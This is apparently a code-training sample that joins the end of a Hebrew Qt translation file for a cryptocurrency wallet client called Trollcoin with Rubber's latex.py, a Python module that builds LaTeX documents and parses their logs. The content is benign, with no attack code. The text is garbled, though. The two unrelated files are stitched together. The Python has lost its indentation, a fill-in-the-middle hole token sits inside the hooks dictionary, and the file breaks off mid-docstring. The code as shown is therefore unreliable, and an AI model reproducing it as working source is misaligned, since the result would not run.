<translation>סרוק מחדש את שרשרת הבלוקים למציאת פעולות חסרות בארנק</translation>
</message>
<message>
<location line="+35"/>
<source>Use OpenSSL (https) for JSON-RPC connections</source>
<translation>השתמש ב-OpenSSL (https) עבור חיבורי JSON-RPC</translation>
</message>
<message>
<location line="-26"/>
<source>Server certificate file (default: server.cert)</source>
<translation>קובץ תעודת שרת (ברירת מחדל: server.cert)</translation>
</message>
<message>
<location line="+1"/>
<source>Server private key (default: server.pem)</source>
<translation>מפתח פרטי של השרת (ברירת מחדל: server.pem)</translation>
</message>
<message>
<location line="-151"/>
<source>Acceptable ciphers (default: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</source>
<translation>צפנים קבילים (ברירת מחדל: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</translation>
</message>
<message>
<location line="+165"/>
<source>This help message</source>
<translation>הודעת העזרה הזו</translation>
</message>
<message>
<location line="+6"/>
<source>Unable to bind to %s on this computer (bind returned error %d, %s)</source>
<translation>לא מסוגל לקשור ל-%s במחשב זה (הקשירה החזירה שגיאה %d, %s)</translation>
</message>
<message>
<location line="-91"/>
<source>Connect through socks proxy</source>
<translation>התחבר דרך פרוקסי SOCKS</translation>
</message>
<message>
<location line="-10"/>
<source>Allow DNS lookups for -addnode, -seednode and -connect</source>
<translation>אפשר בדיקת DNS עבור -addnode, -seednode ו- -connect</translation>
</message>
<message>
<location line="+55"/>
<source>Loading addresses...</source>
<translation>טוען כתובות...</translation>
</message>
<message>
<location line="-35"/>
<source>Error loading wallet.dat: Wallet corrupted</source>
<translation>שגיאה בטעינת הקובץ wallet.dat: הארנק מושחת</translation>
</message>
<message>
<location line="+1"/>
<source>Error loading wallet.dat: Wallet requires newer version of Trollcoin</source>
<translation>שגיאה בטעינת הקובץ wallet.dat: הארנק דורש גרסה חדשה יותר של טרולקוין</translation>
</message>
<message>
<location line="+93"/>
<source>Wallet needed to be rewritten: restart Trollcoin to complete</source>
<translation>יש לכתוב מחדש את הארנק: אתחל את טרולקוין לסיום</translation>
</message>
<message>
<location line="-95"/>
<source>Error loading wallet.dat</source>
<translation>שגיאה בטעינת הקובץ wallet.dat</translation>
</message>
<message>
<location line="+28"/>
<source>Invalid -proxy address: '%s'</source>
<translation>כתובת -proxy לא תקינה: '%s'</translation>
</message>
<message>
<location line="+56"/>
<source>Unknown network specified in -onlynet: '%s'</source>
<translation>רשת לא ידועה צוינה ב- -onlynet: '%s'</translation>
</message>
<message>
<location line="-1"/>
<source>Unknown -socks proxy version requested: %i</source>
<translation>התבקשה גרסת פרוקסי -socks לא ידועה: %i</translation>
</message>
<message>
<location line="-96"/>
<source>Cannot resolve -bind address: '%s'</source>
<translation>לא מסוגל לפתור כתובת -bind: '%s'</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot resolve -externalip address: '%s'</source>
<translation>לא מסוגל לפתור כתובת -externalip: '%s'</translation>
</message>
<message>
<location line="+44"/>
<source>Invalid amount for -paytxfee=<amount>: '%s'</source>
<translation>כמות לא תקינה עבור -paytxfee=<amount>: '%s'</translation>
</message>
<message>
<location line="+1"/>
<source>Invalid amount</source>
<translation>כמות לא תקינה</translation>
</message>
<message>
<location line="-6"/>
<source>Insufficient funds</source>
<translation>אין מספיק כספים</translation>
</message>
<message>
<location line="+10"/>
<source>Loading block index...</source>
<translation>טוען את אינדקס הבלוקים...</translation>
</message>
<message>
<location line="-57"/>
<source>Add a node to connect to and attempt to keep the connection open</source>
<translation>הוסף צומת להתחברות ונסה לשמור את החיבור פתוח</translation>
</message>
<message>
<location line="-25"/>
<source>Unable to bind to %s on this computer. Trollcoin is probably already running.</source>
<translation>לא ניתן לקשור ל-%s במחשב זה. טרולקוין כנראה כבר רץ.</translation>
</message>
<message>
<location line="+64"/>
<source>Fee per KB to add to transactions you send</source>
<translation>עמלה לכל KB שתיווסף לפעולות שאתה שולח</translation>
</message>
<message>
<location line="+19"/>
<source>Loading wallet...</source>
<translation>טוען ארנק...</translation>
</message>
<message>
<location line="-52"/>
<source>Cannot downgrade wallet</source>
<translation>לא ניתן להוריד את גרסת הארנק</translation>
</message>
<message>
<location line="+3"/>
<source>Cannot write default address</source>
<translation>לא יכול לכתוב את כתובת ברירת המחדל</translation>
</message>
<message>
<location line="+64"/>
<source>Rescanning...</source>
<translation>סורק מחדש...</translation>
</message>
<message>
<location line="-57"/>
<source>Done loading</source>
<translation>טעינה הושלמה</translation>
</message>
<message>
<location line="+82"/>
<source>To use the %s option</source>
<translation>להשתמש באפשרות %s</translation>
</message>
<message>
<location line="-74"/>
<source>Error</source>
<translation>שגיאה</translation>
</message>
<message>
<location line="-31"/>
<source>You must set rpcpassword=<password> in the configuration file:
%s
If the file does not exist, create it with owner-readable-only file permissions.</source>
<translation>עליך לקבוע rpcpassword=<password> בקובץ ההגדרות:
%s
אם הקובץ אינו קיים, צור אותו עם הרשאות קריאה לבעלים בלבד.</translation>
</message>
</context>
</TS>

<|file_name|>latex.py<|end_file_name|><|fim▁begin|># This file is part of Rubber and thus covered by the GPL
# (c) Emmanuel Beffara, 2002--2006
"""
LaTeX document building system for Rubber.
This module contains all the code in Rubber that actually does the job of
building a LaTeX document from start to finish.
"""
import os, os.path, sys, imp, time
import re
import string
from rubber import _
from rubber.util import *
from rubber.depend import Node
from rubber.version import moddir
import rubber.latex_modules
from rubber.tex import Parser, EOF, OPEN, SPACE, END_LINE
#---- Module handler ----{{{1
class Modules:
"""
This class gathers all operations related to the management of modules.
The modules are searched for first in the current directory, then as
scripts in the 'modules' directory in the program's data directory, then
as a Python module in the package `rubber.latex_modules'.
"""
def __init__ (self, env):
self.env = env
self.objects = {}
self.commands = {}
def __getitem__ (self, name):
"""
Return the module object of the given name.
"""
return self.objects[name]
def has_key (self, name):
"""
Check if a given module is loaded.
"""
return self.objects.has_key(name)
def register (self, name, dict={}):
"""
Attempt to register a module with the specified name. If the module is
already loaded, do nothing. If it is found and not yet loaded, then
load it, initialise it (using the context passed as optional argument)
and run any delayed commands for it.
"""
if self.has_key(name):
msg.debug(_("module %s already registered") % name, pkg='latex')
return 2
# First look for a script
mod = None
for path in "", os.path.join(moddir, "modules"):
file = os.path.join(path, name + ".rub")
if os.path.exists(file):
mod = ScriptModule(self.env, file)
msg.log(_("script module %s registered") % name, pkg='latex')
break
# Then look for a Python module
if not mod:
try:
file, path, descr = imp.find_module(name,
rubber.latex_modules.__path__)
pymodule = imp.load_module(name, file, path, descr)
file.close()
mod = PyModule(self.env, pymodule, dict)
msg.log(_("built-in module %s registered") % name, pkg='latex')
except ImportError:
msg.debug(_("no support found for %s") % name, pkg='latex')
return 0
# Run any delayed commands.
if self.commands.has_key(name):
for (cmd, args, vars) in self.commands[name]:
msg.push_pos(vars)
try:
# put the variables as they were when the directive was
# found
saved_vars = self.env.vars
self.env.vars = vars
try:
# call the command
mod.command(cmd, args)
finally:
# restore the variables to their current state
self.env.vars = saved_vars
except AttributeError:
msg.warn(_("unknown directive '%s.%s'") % (name, cmd))
except TypeError:
msg.warn(_("wrong syntax for '%s.%s'") % (name, cmd))
msg.pop_pos()
del self.commands[name]
self.objects[name] = mod
return 1
def command (self, mod, cmd, args):
"""
Send a command to a particular module. If this module is not loaded,
store the command so that it will be sent when the module is registered.
"""
if self.objects.has_key(mod):
self.objects[mod].command(cmd, args)
else:
if not self.commands.has_key(mod):
self.commands[mod] = []
self.commands[mod].append((cmd, args, self.env.vars))
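# A minimal usage sketch (hypothetical, not part of Rubber itself): directives
# addressed to a module that is not loaded yet are queued by `command', then
# replayed in order once `register' loads the module.
#
#   mods = Modules(env)
#   mods.command("bibtex", "somecmd", ["arg"])  # 'somecmd' is a made-up directive
#   mods.register("bibtex")                     # loads the module, replays the call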
#---- Log parser ----{{{1
re_loghead = re.compile("This is [0-9a-zA-Z-]*")
re_rerun = re.compile("LaTeX Warning:.*Rerun")
re_file = re.compile("(\\((?P<file>[^ \n\t(){}]*)|\\))")
re_badbox = re.compile(r"(Ov|Und)erfull \\[hv]box ")
re_line = re.compile(r"(l\.(?P<line>[0-9]+)( (?P<code>.*))?$|<\*>)")
re_cseq = re.compile(r".*(?P<seq>(\\|\.\.\.)[^ ]*) ?$")
re_macro = re.compile(r"^(?P<macro>\\.*) ->")
re_page = re.compile("\[(?P<num>[0-9]+)\]")
re_atline = re.compile(
"( detected| in paragraph)? at lines? (?P<line>[0-9]*)(--(?P<last>[0-9]*))?")
re_reference = re.compile("LaTeX Warning: Reference `(?P<ref>.*)' \
on page (?P<page>[0-9]*) undefined on input line (?P<line>[0-9]*)\\.$")
re_label = re.compile("LaTeX Warning: (?P<text>Label .*)$")
re_warning = re.compile(
"(LaTeX|Package)( (?P<pkg>.*))? Warning: (?P<text>.*)$")
re_online = re.compile("(; reported)? on input line (?P<line>[0-9]*)")
re_ignored = re.compile("; all text was ignored after line (?P<line>[0-9]*).$")
class LogCheck (object):
"""
This class performs all the extraction of information from the log file.
For efficiency, the instances contain the whole file as a list of strings
so that it can be read several times with no disk access.
"""
#-- Initialization {{{2
def __init__ (self):
self.lines = None
def read (self, name):
"""
Read the specified log file, checking that it was produced by the
right compiler. Returns true if the log file is invalid or does not
exist.
"""
self.lines = None
try:
file = open(name)
except IOError:
return 2
line = file.readline()
if not line:
file.close()
return 1
if not re_loghead.match(line):
file.close()
return 1
self.lines = file.readlines()
file.close()
return 0
#-- Process information {{{2
def errors (self):
"""
Returns true if there was an error during the compilation.
"""
skipping = 0
for line in self.lines:
if line.strip() == "":
skipping = 0
continue
if skipping:
continue
m = re_badbox.match(line)
if m:
skipping = 1
continue
if line[0] == "!":
# We check for the substring "pdfTeX warning" because pdfTeX
# sometimes issues warnings (like undefined references) in the
# form of errors...
if string.find(line, "pdfTeX warning") == -1:
return 1
return 0
def run_needed (self):
"""
Returns true if LaTeX indicated that another compilation is needed.
"""
for line in self.lines:
if re_rerun.match(line):
return 1
return 0
#-- Information extraction {{{2
def continued (self, line):
"""
Check if a line in the log is continued on the next line. This is
needed because TeX breaks messages at 79 characters per line. We make
this into a method because the test is slightly different in Metapost.
"""
return len(line) == 79
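# For example, a long warning such as
#   LaTeX Warning: Reference `sec:intro' on page 12 undefined on input li
#   ne 345.
# reaches the log as two physical lines, the first one hitting the
# 79-character limit; `parse' below uses `continued' to glue them back together.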
def parse (self, errors=0, boxes=0, refs=0, warnings=0):
"""
Parse the log file for relevant information. The named arguments are
booleans that indicate which information should be extracted:
- errors: all errors
- boxes: bad boxes
- refs: warnings about references
- warnings: all other warnings
The function returns a generator. Each generated item is a dictionary
that contains (some of) the following entries:
- kind: the kind of information ("error", "box", "ref", "warning")
- text: the text of the error or warning
- code: the piece of code that caused an error
- file, line, last, pkg: as used by Message.format_pos.
"""
if not self.lines:
return
last_file = None
pos = [last_file]
page = 1
parsing = 0 # 1 if we are parsing an error's text
skipping = 0 # 1 if we are skipping text until an empty line
something = 0 # 1 if some error was found
prefix = None # the prefix for warning messages from packages
accu = "" # accumulated text from the previous line
macro = None # the macro in which the error occurs
cseqs = {} # undefined control sequences so far
for line in self.lines:
line = line[:-1] # remove the line feed
# TeX breaks messages at 79 characters, just to make parsing
# trickier...
if not parsing and self.continued(line):
accu += line
continue
line = accu + line
accu = ""
# Text that should be skipped (from bad box messages)
if prefix is None and line == "":
skipping = 0
continue
if skipping:
continue
# Errors (including aborted compilation)
if parsing:
if error == "Undefined control sequence.":
# This is a special case in order to report which control
# sequence is undefined.
m = re_cseq.match(line)
if m:
seq = m.group("seq")
if cseqs.has_key(seq):
error = None
else:
cseqs[seq] = None
error = "Undefined control sequence %s." % m.group("seq")
m = re_macro.match(line)
if m:
macro = m.group("macro")
m = re_line.match(line)
if m:
parsing = 0
skipping = 1
pdfTeX = string.find(error, "pdfTeX warning") != -1
if error is not None and ((pdfTeX and warnings) or (errors and not pdfTeX)):
if pdfTeX:
d = {
"kind": "warning",
"pkg": "pdfTeX",
"text": error[error.find(":")+2:]
}
else:
d = {
"kind": "error",
"text": error
}
d.update( m.groupdict() )
m = re_ignored.search(error)
if m:
d["file"] = last_file
if d.has_key("code"):
del d["code"]
d.update( m.groupdict() )
elif pos[-1] is None:
d["file"] = last_file
else:
d["file"] = pos[-1]
if macro is not None:
d["macro"] = macro
macro = None
yield d
elif line[0] == "!":
error = line[2:]
elif line[0:3] == "***":
parsing = 0
skipping = 1
if errors:
yield {
"kind": "abort",
"text": error,
"why" : line[4:],
"file": last_file
}
elif line[0:15] == "Type X to quit ":
parsing = 0
skipping = 0
if errors:
yield {
"kind": "error",
"text": error,
"file": pos[-1]
}
continue
if len(line) > 0 and line[0] == "!":
error = line[2:]
parsing = 1
continue
if line == "Runaway argument?":
error = line
parsing = 1
continue
# Long warnings
if prefix is not None:
if line[:len(prefix)] == prefix:
text.append(string.strip(line[len(prefix):]))
else:
text = " ".join(text)
m = re_online.search(text)
if m:
info["line"] = m.group("line")
text = text[:m.start()] + text[m.end():]
if warnings:
info["text"] = text
d = { "kind": "warning" }
d.update( info )
yield d
prefix = None
continue
# Undefined references
m = re_reference.match(line)
if m:
if refs:
d = {
"kind": "warning",
"text": _("Reference `%s' undefined.") % m.group("ref"),
"file": pos[-1]
}
d.update( m.groupdict() )
yield d
continue
m = re_label.match(line)
if m:
if refs:
d = {
"kind": "warning",
"file": pos[-1]
}
d.update( m.groupdict() )
yield d
continue
# Other warnings
if line.find("Warning") != -1:
m = re_warning.match(line)
if m:
info = m.groupdict()
info["file"] = pos[-1]
info["page"] = page
if info["pkg"] is None:
del info["pkg"]
prefix = ""
else:
prefix = ("(%s)" % info["pkg"])
prefix = prefix.ljust(m.start("text"))
text = [info["text"]]
continue
# Bad box messages
m = re_badbox.match(line)
if m:
if boxes:
mpos = { "file": pos[-1], "page": page }
m = re_atline.search(line)
if m:
md = m.groupdict()
for key in "line", "last":
if md[key]: mpos[key] = md[key]
line = line[:m.start()]
d = {
"kind": "warning",
"text": line
}
d.update( mpos )
yield d
skipping = 1
continue
# If there is no message, track source names and page numbers.
last_file = self.update_file(line, pos, last_file)
page = self.update_page(line, page)
def get_errors (self):
return self.parse(errors=1)
def get_boxes (self):
return self.parse(boxes=1)
def get_references (self):
return self.parse(refs=1)
def get_warnings (self):
return self.parse(warnings=1)
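# A hypothetical standalone use of LogCheck (the file name is an assumption):
#
#   log = LogCheck()
#   if log.read("paper.log") == 0:
#       for item in log.get_errors():
#           # each yielded item is a dict with at least "kind" and "text"
#           print "%s: %s" % (item["kind"], item["text"])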
def update_file (self, line, stack, last):
"""
Parse the given line of log file for file openings and closings and
update the list `stack'. Newly opened files are at the end, therefore
stack[1] is the main source while stack[-1] is the current one. The
first element, stack[0], contains the value None for errors that may
happen outside the source. Return the last file from which text was
read (the new stack top, or the one before the last closing
parenthesis).
"""
m = re_file.search(line)
while m:
if line[m.start()] == '(':
last = m.group("file")
stack.append(last)
else:
last = stack[-1]
del stack[-1]
line = line[m.end():]
m = re_file.search(line)
return last
def update_page (self, line, before):
"""
Parse the given line and return the number of the page that is being
built after that line, assuming the current page before the line was
`before'.
"""
ms = re_page.findall(line)
if ms == []:
return before
return int(ms[-1]) + 1
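# Example: if `before' is 3 and the line reads "[3] [4] (figs/a.tex", the
# last page marker found is "[4]", so the page being built afterwards is 5.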
#---- Parsing and compiling ----{{{1
re_command = re.compile("%[% ]*rubber: *(?P<cmd>[^ ]*) *(?P<arg>.*).*")
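# This matches Rubber directives embedded in TeX comments, for instance:
#   % rubber: module pdftex
#   % rubber: depend figures/plot.eps
# where group "cmd" captures the directive name and "arg" the raw arguments.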
class SourceParser (Parser):
"""
Extends the general-purpose TeX parser to handle Rubber directives in the
comment lines.
"""
def __init__ (self, file, dep):
Parser.__init__(self, file)
self.latex_dep = dep
def read_line (self):
while Parser.read_line(self):
match = re_command.match(self.line.strip())
if match is None:
return True
vars = dict(self.latex_dep.vars.items())
vars['line'] = self.pos_line
args = parse_line(match.group("arg"), vars)
self.latex_dep.command(match.group("cmd"), args, vars)
return False
def skip_until (self, expr):
regexp = re.compile(expr)
while Parser.read_line(self):
match = regexp.match(self.line)
if match is None:
continue
self.line = self.line[match.end():]
self.pos_char += match.end()
return
class EndDocument:
""" This is the exception raised when \\end{document} is found. """
pass
class EndInput:
""" This is the exception raised when \\endinput is found. """
pass
class LaTeXDep (Node):
"""
This class represents dependency nodes for LaTeX compilation. It handles
the cyclic LaTeX compilation until a stable output, including actual
compilation (with a parametrable executable) and possible processing of
compilation results (e.g. running BibTeX).
Before building (or cleaning) the document, the method `parse' must be
called to load and configure all required modules. Text lines are read
from the files and parsed to extract LaTeX macro calls. When such a macro
is found, a handler is searched for in the `hooks' dictionary. Handlers
are called with one argument: the dictionary for the regular expression
that matches the macro call.
"""
#-- Initialization {{{2
def __init__ (self, env):
"""
Initialize the environment. This prepares the processing steps for the
given file (all steps are initialized empty) and sets the regular
expressions and the hook dictionary.
"""
Node.__init__(self, env.depends)
self.env = env
self.log = LogCheck()
self.modules = Modules(self)
self.vars = Variables(env.vars, {
"program": "latex",
"engine": "TeX",
"paper": "",
"arguments": [],
"src-specials": "",
"source": None,
"target": None,
"path": None,
"base": None,
"ext": None,
"job": None,
"graphics_suffixes" : [] })
self.vars_stack = []
self.cmdline = ["\\nonstopmode", "\\input{%s}"]
if self.vars.get('shell_escape', 0):
self.cmdline.insert(0, '--shell-escape')
# the initial hooks:
self.comment_mark = "%"
self.hooks = {
"begin": ("a", self.h_begin),
"end": ("a", self.h_end),
"pdfoutput": ("", self.h_pdfoutput),
"input" : ("", self.h_input),
"include" : ("a", self.h_include),
"includeonly": ("a", self.h_includeonly),
"usepackage" : ("oa", self.h_usepackage),
"RequirePackage" : ("oa", self.h_usepackage),
"documentclass" : ("oa", self.h_documentclass),
"LoadClass" : ("oa", self.h_documentclass),
"LoadClassWithOptions" : ("a", self.h_documentclass),
"tableofcontents" : ("", self.h_tableofcontents),
"listoffigures" : ("", self.h_listoffigures),<|fim▁hole|> "endinput" : ("", self.h_endinput)
}
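# The first element of each hook entry is its argument format, consumed by
# parse_file below: 'a' reads one mandatory {...} argument and 'o' one
# optional [...] argument, so "oa" for \usepackage parses \usepackage[opt]{names}.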
self.begin_hooks = {
"verbatim": self.h_begin_verbatim,
"verbatim*": lambda loc: self.h_begin_verbatim(loc, env="verbatim\\*")
}
self.end_hooks = {
"document": self.h_end_document
}
self.hooks_changed = True
self.include_only = {}
# description of the building process:
self.aux_md5 = {}
self.aux_old = {}
self.watched_files = {}
self.onchange_md5 = {}
self.onchange_cmd = {}
self.removed_files = []
self.not_included = [] # dependencies that don't trigger latex
# state of the builder:
self.processed_sources = {}
self.must_compile = 0
self.something_done = 0
self.failed_module = None
def set_source (self, path, jobname=None):
"""
Specify the main source for the document. The exact path and file name
are determined, and the source building process is updated if needed,
according the the source file's extension. The optional argument
'jobname' can be used to specify the job name to something else that
the base of the file name.
"""
name = self.env.find_file(path, ".tex")
if not name:
msg.error(_("cannot find %s") % name)
return 1
self.reset_sources()
self.vars['source'] = name
(src_path, name) = os.path.split(name)
self.vars['path'] = src_path
(job, self.vars['ext']) = os.path.splitext(name)
if jobname is None:
self.set_job = 0
else:
self.set_job = 1
job = jobname
self.vars['job'] = job
if src_path == "":
src_path = "."
self.vars['base'] = job
else:
self.env.path.append(src_path)
self.vars['base'] = os.path.join(src_path, job)
source = self.source()
prefix = os.path.join(self.vars["cwd"], "")
if source[:len(prefix)] == prefix:
comp_name = source[len(prefix):]
else:
comp_name = source
if comp_name.find('"') >= 0:
msg.error(_("The filename contains \", latex cannot handle this."))
return 1
for c in " \n\t()":
if source.find(c) >= 0:
msg.warn(_("Source path uses special characters, error tracking might get confused."))
break
self.vars['target'] = self.target = os.path.join(prefix, job)
self.reset_products([self.target + ".dvi"])
return 0
def includeonly (self, files):
"""
Use partial compilation, by appending a call to \\includeonly on the
command line on compilation.
"""
if self.vars["engine"] == "VTeX":
msg.error(_("I don't know how to do partial compilation on VTeX."))
return
if self.cmdline[-2][:13] == "\\includeonly{":
self.cmdline[-2] = "\\includeonly{" + ",".join(files) + "}"
else:
self.cmdline.insert(-1, "\\includeonly{" + ",".join(files) + "}")
for f in files:
self.include_only[f] = None
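# For instance, includeonly(["ch1", "ch2"]) turns the command line into
#   \nonstopmode \includeonly{ch1,ch2} \input{<source>}
# so that LaTeX compiles only those \include files.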
def source (self):
"""
Return the main source's complete filename.
"""
return self.vars['source']
def abspath (self, name, ref=None):
"""
Return the absolute path of a given filename. Relative paths are
considered relative to the file currently processed, the optional
argument "ref" can be used to override the reference file name.
"""
path = self.vars["cwd"]
if ref is None and self.vars.has_key("file"):
ref = self.vars["file"]
if ref is not None:
path = os.path.join(path, os.path.dirname(ref))
return os.path.abspath(os.path.join(path, os.path.expanduser(name)))
#-- LaTeX source parsing {{{2
def parse (self):
"""
Parse the source for packages and supported macros.
"""
try:
self.process(self.source())
except EndDocument:
pass
self.set_date()
msg.log(_("dependencies: %r") % self.sources, pkg='latex')
def parse_file (self, file):
"""
Process a LaTeX source. The file must be open, it is read to the end
calling the handlers for the macro calls. This recursively processes
the included sources.
"""
parser = SourceParser(file, self)
parser.set_hooks(self.hooks.keys())
self.hooks_changed = False
while True:
if self.hooks_changed:
parser.set_hooks(self.hooks.keys())
self.hooks_changed = False
token = parser.next_hook()
if token.cat == EOF:
break
format, function = self.hooks[token.val]
args = []
for arg in format:
if arg == 'a':
args.append(parser.get_argument_text())
elif arg == 'o':
args.append(parser.get_latex_optional_text())
self.parser = parser
self.vars['line'] = parser.pos_line
function(self.vars, *args)
def process (self, path):
"""
This method is called when an included file is processed. The argument
must be a valid file name.
"""
if self.processed_sources.has_key(path):
msg.debug(_("%s already parsed") % path, pkg='latex')
return
self.processed_sources[path] = None
if path not in self.sources:
self.add_source(path)
try:
saved_vars = self.vars
try:
msg.log(_("parsing %s") % path, pkg='latex')
self.vars = Variables(saved_vars,
{ "file": path, "line": None })
file = open(path)
try:
self.parse_file(file)
finally:
file.close()
finally:
self.vars = saved_vars
msg.debug(_("end of %s") % path, pkg='latex')
except EndInput:
pass
def input_file (self, name, loc={}):
"""
Treat the given name as a source file to be read. If this source can
be the result of some conversion, then the conversion is performed,
otherwise the source is parsed. The returned value is a couple
(name,dep) where `name' is the actual LaTeX source and `dep' is
its dependency node. The return value is (None,None) if the source
could neither be read nor built.
"""
if name.find("\\") >= 0 or name.find("#") >= 0:
return None, None
for path in self.env.path:
pname = os.path.join(path, name)
dep = self.env.convert(pname, suffixes=[".tex",""], context=self.vars)
if dep:
file = dep.products[0]
else:
file = self.env.find_file(name, ".tex")
if not file:
continue
dep = None
self.add_source(file)
if dep is None or dep.is_leaf():
self.process(file)
if dep is None:
return file, self.set[file]
else:
return file, dep
return None, None
#-- Directives {{{2
def command (self, cmd, args, pos=None):
"""
Execute the rubber command 'cmd' with arguments 'args'. This is called
when a command is found in the source file or in a configuration file.
A command name of the form 'foo.bar' is considered to be a command
'bar' for module 'foo'. The argument 'pos' describes the position
(file and line) where the command occurs.
"""
if pos is None:
pos = self.vars
# Calls to this method are actually translated into calls to "do_*"
# methods, except for calls to module directives.
lst = string.split(cmd, ".", 1)
#try:
if len(lst) > 1:
self.modules.command(lst[0], lst[1], args)
elif not hasattr(self, "do_" + cmd):
msg.warn(_("unknown directive '%s'") % cmd, **pos)
else:
msg.log(_("directive: %s") % ' '.join([cmd]+args), pkg='latex')
getattr(self, "do_" + cmd)(*args)
#except TypeError:
# msg.warn(_("wrong syntax for '%s'") % cmd, **pos)
def do_alias (self, name, val):
if self.hooks.has_key(val):
self.hooks[name] = self.hooks[val]
self.hooks_changed = True
def do_clean (self, *args):
for file in args:
self.removed_files.append(self.abspath(file))
def do_depend (self, *args):
for arg in args:
file = self.env.find_file(arg)
if file:
self.add_source(file)
else:
msg.warn(_("dependency '%s' not found") % arg, **self.vars)
def do_make (self, file, *args):
file = self.abspath(file)
vars = { "target": file }
while len(args) > 1:
if args[0] == "from":
vars["source"] = self.abspath(args[1])
elif args[0] == "with":
vars["name"] = args[1]
else:
break
args = args[2:]
if len(args) != 0:
msg.error(_("invalid syntax for 'make'"), **self.vars)
return
self.env.conv_set(file, vars)
def do_module (self, mod, opt=None):
dict = { 'arg': mod, 'opt': opt }
self.modules.register(mod, dict)
def do_onchange (self, file, cmd):
file = self.abspath(file)
self.onchange_cmd[file] = cmd
if os.path.exists(file):
self.onchange_md5[file] = md5_file(file)
else:
self.onchange_md5[file] = None
def do_paper (self, arg):
self.vars["paper"] = arg
def do_path (self, name):
self.env.path.append(self.abspath(name))
def do_read (self, name):
path = self.abspath(name)
self.push_vars(file=path, line=None)
try:
file = open(path)
lineno = 0
for line in file.readlines():
lineno += 1
line = line.strip()
if line == "" or line[0] == "%":
continue
self.vars["line"] = lineno
lst = parse_line(line, self.vars)
self.command(lst[0], lst[1:])
file.close()
except IOError:
msg.warn(_("cannot read option file %s") % name, **self.vars)
self.pop_vars()
def do_rules (self, file):
name = self.env.find_file(file)
if name is None:
msg.warn(_("cannot read rule file %s") % file, **self.vars)
else:
self.env.converter.read_ini(name)
def do_set (self, name, val):
try:
self.vars[name] = val
except KeyError:
msg.warn(_("unknown variable: %s") % name, **self.vars)
def do_setlist (self, name, *val):
try:
self.vars[name] = val
except KeyError:
msg.warn(_("unknown variable: %s") % name, **self.vars)
def do_watch (self, *args):
for arg in args:
self.watch_file(self.abspath(arg))
#-- Macro handling {{{2
def hook_macro (self, name, format, fun):
self.hooks[name] = (format, fun)
self.hooks_changed = True
def hook_begin (self, name, fun):
self.begin_hooks[name] = fun
def hook_end (self, name, fun):
self.end_hooks[name] = fun
# Now the macro handlers:
def h_begin (self, loc, env):
if self.begin_hooks.has_key(env):
self.begin_hooks[env](loc)
def h_end (self, loc, env):
if self.end_hooks.has_key(env):
self.end_hooks[env](loc)
def h_pdfoutput (self, loc):
"""
Called when \\pdfoutput is found. Tries to guess if it is a definition
that asks for the output to be in PDF or DVI.
"""
parser = self.parser
token = parser.get_token()
if token.raw == '=':
token2 = parser.get_token()
if token2.raw == '0':
mode = 0
elif token2.raw == '1':
mode = 1
else:
parser.put_token(token2)
return
elif token.raw == '0':
mode = 0
elif token.raw == '1':
mode = 1
else:
parser.put_token(token)
return
if mode == 0:
if 'pdftex' in self.modules:
self.modules['pdftex'].pymodule.mode_dvi()
else:
self.modules.register('pdftex', {'opt': 'dvi'})
else:
if 'pdftex' in self.modules:
self.modules['pdftex'].pymodule.mode_pdf()
else:
self.modules.register('pdftex')
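# Example: a source line "\pdfoutput=1" registers the pdftex module in PDF
# mode, "\pdfoutput=0" registers it in DVI mode, and any other token is
# pushed back and the macro is ignored.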
def h_input (self, loc):
"""
Called when an \\input macro is found. This calls the `process' method
if the included file is found.
"""
token = self.parser.get_token()
if token.cat == OPEN:
file = self.parser.get_group_text()
else:
file = ""
while token.cat not in (EOF, SPACE, END_LINE):
file += token.raw
token = self.parser.get_token()
self.input_file(file, loc)
def h_include (self, loc, filename):
"""
Called when an \\include macro is found. This includes files into the
source in a way very similar to \\input, except that LaTeX also
creates .aux files for them, so we have to notice this.
"""
if self.include_only and not self.include_only.has_key(filename):
return
file, _ = self.input_file(filename, loc)
if file:
aux = filename + ".aux"
self.removed_files.append(aux)
self.aux_old[aux] = None
if os.path.exists(aux):
self.aux_md5[aux] = md5_file(aux)
else:
self.aux_md5[aux] = None
def h_includeonly (self, loc, files):
"""
Called when the macro \\includeonly is found, indicates the
comma-separated list of files that should be included, so that the
other \\include macros are ignored.
"""
self.include_only = {}
for name in files.split(","):
name = name.strip()
if name != "":
self.include_only[name] = None
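# Example: \includeonly{ch1, ch2} leaves include_only == {"ch1": None,
# "ch2": None}, and h_include above then skips any \include whose file name
# is not one of these keys.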
def h_documentclass (self, loc, opt, name):
"""
Called when the macro \\documentclass is found. It almost has the same
effect as `usepackage': if the source's directory contains the class
file, this file is treated as an input, otherwise a module is
searched for to support the class.
"""
file = self.env.find_file(name + ".cls")
if file:
self.process(file)
else:
dict = Variables(self.vars, { 'opt': opt })
self.modules.register(name, dict)
def h_usepackage (self, loc, opt, names):
"""
Called when a \\usepackage macro is found. If there is a package in the
directory of the source file, then it is treated as an include file
unless there is a supporting module in the current directory,
otherwise it is treated as a package.
"""
for name in string.split(names, ","):
name = name.strip()
file = self.env.find_file(name + ".sty")
if file and not os.path.exists(name + ".py"):
self.process(file)
else:
dict = Variables(self.vars, { 'opt': opt })
self.modules.register(name, dict)
def h_tableofcontents (self, loc):
self.watch_file(self.target + ".toc")
def h_listoffigures (self, loc):
self.watch_file(self.target + ".lof")
def h_listoftables (self, loc):
self.watch_file(self.target + ".lot")
def h_bibliography (self, loc, names):
"""
Called when the macro \\bibliography is found. This method actually
registers the module bibtex (if not already done) and registers the
databases.
"""
self.modules.register("bibtex", dict)
# This registers the actual hooks, so that subsequent occurrences of
# \bibliography and \bibliographystyle will be caught by the module.
# However, the first time, we have to call the hooks from here. The
# line below assumes that the new hook has the same syntax.
self.hooks['bibliography'][1](loc, names)
def h_bibliographystyle (self, loc, name):
"""
Called when \\bibliographystyle is found. This registers the module
bibtex (if not already done) and calls the method set_style() of the
module.
"""
self.modules.register("bibtex", dict)
# The same remark as in 'h_bibliography' applies here.
self.hooks['bibliographystyle'][1](loc, name)
def h_begin_verbatim (self, dict, env="verbatim"):
"""
Called when \\begin{verbatim} is found. This disables all macro
handling and comment parsing until the end of the environment. The
optional argument 'env' gives the environment name, so that the end
marker is "\\end{env}" ("\\end{verbatim}" by default).
"""
self.parser.skip_until(r"[ \t]*\\end\{%s\}.*" % env)
def h_endinput (self, dict):
"""
Called when \\endinput is found. This stops the processing of the
current input file, thus ignoring any code that appears afterwards.
"""
raise EndInput
def h_end_document (self, dict):
"""
